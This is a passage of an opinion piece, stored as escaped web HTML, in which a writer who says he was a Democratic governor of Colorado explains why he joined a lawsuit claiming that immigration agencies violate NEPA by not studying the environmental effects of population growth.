This is why I\u2019ve <a href=\"http:\/\/www.irli.org\/nepa\" target=\"_blank\"><b>joined a lawsuit<\/b><\/a>\u00a0filed this week challenging our immigration authorities on failing to calculate the costs of their population growth-inducing policies.<\/p>\n<p>Under the National Environmental Policy Act (NEPA), all federal agencies must take a \u201chard look\u201d at every \u201cmajor federal action\u201d they commit to.<\/p>\n<p><img loading=\"lazy\" class=\"alignright size-medium wp-image-6403\" alt=\"DHS Estimates of Legal Temporary Residents | ImmigrationReform.com\" src=\"http:\/\/live-immigrationreform.pantheonsite.io\/wp-content\/uploads\/2014\/04\/world_population_800x600-300x225.jpg\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2014\/04\/world_population_800x600-300x225.jpg 300w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2014\/04\/world_population_800x600-100x75.jpg 100w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2014\/04\/world_population_800x600-768x576.jpg 768w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2014\/04\/world_population_800x600.jpg 800w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>While it\u2019s apparently been well-understood that, for instance, the Department of Transportation must analyze the environmental effects of any highways and byways it commissions, for the Homeland Security department, which implements policies that make those highways and byways necessary, it apparently isn\u2019t. In fact, they\u2019ve never made such an analysis on the effects of immigration. And they\u2019ve been violating environmental law ever since.<\/p>\n<p>I\u2019ve lived in Colorado continuously since 1961. I was in the Colorado state legislature from 1967 to 1974, and I served as the governor of Colorado from 1975 to 1987, in both capacities as a member of the Democratic Party.<\/p>\n<p>I\u2019ve watched Colorado go from a lovely state with a high quality of life to a Colorado whose front range (from Pueblo to Fort. Collins) is rapidly becoming a Los Angeles of the Rockies.
